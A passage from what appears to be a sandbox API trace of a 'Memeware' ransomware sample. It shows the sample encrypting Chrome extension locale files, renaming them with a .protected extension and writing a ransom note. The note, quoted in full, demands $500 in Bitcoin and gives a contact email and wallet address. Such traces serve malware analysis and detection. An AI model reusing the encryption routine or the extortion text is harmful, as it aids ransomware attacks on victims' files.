lpNewFilePointer=0xffffffff) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.018] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.018] CloseHandle (hObject=0x168) returned 1 [0084.018] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected") returned 174 [0084.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected")) returned 1 [0084.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.019] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\RESTORE_FILES.txt") returned 168 [0084.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.019] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.019] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.020] lstrlenA (lpString="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") returned 684 [0084.020] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.020] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.020] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.020] CloseHandle (hObject=0x164) returned 1 [0084.020] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Windows") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Program Files") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Program Files (x86)") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="$Recycle.bin") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="System Volume Information") returned 1 [0084.020] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned 150 [0084.020] lstrcmpW (lpString1="zh", lpString2=".") returned 1 [0084.020] lstrcmpW (lpString1="zh", lpString2="..") returned 1 [0084.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*") returned 152 [0084.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.021] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\.") returned 152 [0084.021] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\..") returned 153 [0084.021] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.021] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.021] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.021] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.022] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.023] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.023] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.023] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.024] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.024] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.024] CloseHandle (hObject=0x168) returned 1 [0084.024] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected") returned 174 [0084.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected")) returned 1 [0084.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.024] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\RESTORE_FILES.txt") returned 
168 [0084.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.025] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.025] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.025] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.025] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.026] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.026] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.026] CloseHandle (hObject=0x164) returned 1 [0084.026] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0084.026] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned 153 [0084.026] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0084.026] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0084.026] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*") returned 155 [0084.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.026] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.026] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.026] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\.") returned 155 [0084.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.026] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.027] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.027] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\..") returned 156 [0084.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 
[0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.027] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.027] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.027] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.027] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.029] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
